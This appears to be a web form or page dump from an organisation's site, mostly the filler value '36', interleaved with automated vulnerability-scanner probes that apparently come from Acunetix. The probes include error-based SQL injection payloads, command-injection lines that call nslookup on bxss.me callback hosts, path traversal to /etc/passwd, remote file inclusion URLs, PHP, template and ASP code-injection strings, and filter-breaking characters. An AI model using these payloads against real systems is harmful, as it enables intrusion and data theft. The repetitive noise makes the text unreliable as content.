0163364000
0502825999
info@aytam-buk.org.sa

36
36
1CbQQErgO
1x8DIfonO
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(121),CHAR(70),CHAR(121),CHAR(120),CHAR(100),CHAR(86),CHAR(65),CHAR(120)) from information_schema.tables limit 0
(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(121),CHAR(70),CHAR(121),CHAR(120),CHAR(100),CHAR(86),CHAR(65),CHAR(120)),floor(rand()*2))x from (select 1 union s
(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(121)+CHAR(70)+CHAR(121)+CHAR(120)+CHAR(100)+CHAR(86)+CHAR(65)+CHAR(120)) FROM syscolumns)
convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(121)+CHAR(70)+CHAR(121)+CHAR(120)+CHAR(100)+CHAR(86)+CHAR(65)+CHAR(120))
0
"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(54),CHAR(85),CHAR(83),CHAR(108),CHAR(117),CHAR(71),CHAR(74),CHAR(74)) from information_schema.tables limit 0,1
"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(54),CHAR(85),CHAR(83),CHAR(108),CHAR(117),CHAR(71),CHAR(74),CHAR(74)),floor(rand()*2))x from (select 1 union sel
"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(54)+CHAR(85)+CHAR(83)+CHAR(108)+CHAR(117)+CHAR(71)+CHAR(74)+CHAR(74)) FROM syscolumns)+"
"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(54)+CHAR(85)+CHAR(83)+CHAR(108)+CHAR(117)+CHAR(71)+CHAR(74)+CHAR(74))+"
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
)
!(()&&!|*|*|
^(#$!@#$)(()))******
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
set|set&set
nslookup hitt4xTnca9Jh7061b.bxss.me
$(nslookup hitVyefmzgz0m242d9.bxss.me)
|nslookup hitSIKCs4rMxD85ded.bxss.me
`nslookup hitGrDr2OqUEwf8eb0.bxss.me`
;nslookup hitHRowrKGPZ1e5639.bxss.me|nslookup hitHRowrKGPZ1e5639.bxss.me&nslookup hitHRowrKGPZ1e5639.bxss.me;
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
../../../../../../../../../../etc/passwd
36
../36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1some_inexistent_file_with_long_name.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
bxss.me
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
;print(md5(31337));
";print(md5(31337));$a="
${@print(md5(31337))}
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
36
36
36
36
36
36
36
36
36
36
36
36
36
${9999397+9999707}
36
36
36
36
36
36
36
36
36
36
36
36
36
36
1MboYcFnO
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
ajax.php
ajax.php
ajax.php/.
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
http://hitJAKxko2AHB.bxss.me/
36
36
36
36
36
36
36
36
36
369680838
{{50121*50340}}
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(103),CHAR(114),CHAR(49),CHAR(119),CHAR(97),CHAR(89),CHAR(52)) from information_schema.tables limit 0,
(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(103),CHAR(114),CHAR(49),CHAR(119),CHAR(97),CHAR(89),CHAR(52)),floor(rand()*2))x from (select 1 union se
(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(105)+CHAR(103)+CHAR(114)+CHAR(49)+CHAR(119)+CHAR(97)+CHAR(89)+CHAR(52)) FROM syscolumns)
convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(105)+CHAR(103)+CHAR(114)+CHAR(49)+CHAR(119)+CHAR(97)+CHAR(89)+CHAR(52))
0
"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(81),CHAR(76),CHAR(101),CHAR(69),CHAR(89),CHAR(104),CHAR(110),CHAR(84)) from information_schema.tables limit 0,
"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(81),CHAR(76),CHAR(101),CHAR(69),CHAR(89),CHAR(104),CHAR(110),CHAR(84)),floor(rand()*2))x from (select 1 union se
"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(81)+CHAR(76)+CHAR(101)+CHAR(69)+CHAR(89)+CHAR(104)+CHAR(110)+CHAR(84)) FROM syscolumns)+"
"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(81)+CHAR(76)+CHAR(101)+CHAR(69)+CHAR(89)+CHAR(104)+CHAR(110)+CHAR(84))+"
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
)
!(()&&!|*|*|
^(#$!@#$)(()))******
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
set|set&set
nslookup hitfGUcPfMdY14a027.bxss.me
$(nslookup hitKwm7WcmHl7d0524.bxss.me)
|nslookup hitZa77iWbWid0b92b.bxss.me
`nslookup hitOSWacZrMMv241cb.bxss.me`
;nslookup hithFhhrGViCJ51551.bxss.me|nslookup hithFhhrGViCJ51551.bxss.me&nslookup hithFhhrGViCJ51551.bxss.me;
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
../../../../../../../../../../etc/passwd
36
../36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1some_inexistent_file_with_long_name.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
bxss.me
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
;print(md5(31337));
";print(md5(31337));$a="
${@print(md5(31337))}
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
36
36
36
36
36
36
36
36
36
36
36
36
36
${9999243+9999151}
36
36
36
36
36
36
36
36
36
36
36
36
36
1Q4sM524O
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
ajax.php
ajax.php
ajax.php/.
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
http://hitaJ2KJHNXAT.bxss.me/
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
jVP2TD6o
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
response.write(9789193*9954727)
36
36
36
36
36
36
36
36
36
36
"+response.write(9789193*9954727)+"
36
36
36
36
36
36
36
36
36
set|set&set
36
$(nslookup fJFvZP29)
36
36
36
36
36
36
36
36
${9999735+10000205}
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36&n933077=v997379
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
http://testasp.vulnweb.com/t/xss.html?%00.jpg
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
)
36
36
36
36
36
!(()&&!|*|*|
36
36
36
36
36
36
36
36
36
36
36
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
36
^(#$!@#$)(()))******
36
36
36
36
1some_inexistent_file_with_long_name.jpg
36
36
36
36
36
36
36
36
Http://testasp.vulnweb.com/t/fit.txt
36
36
36
36
36
36
36
36
36
36
http://testasp.vulnweb.com/t/fit.txt?.jpg
36
36
36
36
36
36
36
testasp.vulnweb.com
36
ajax.php
36
http://hitDY8eh9dYdb.bxss.me/
36
36
36
36
36
ajax.php
36
36
36
36
36
36
36
36
36
36
ajax.php/.
36
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36
36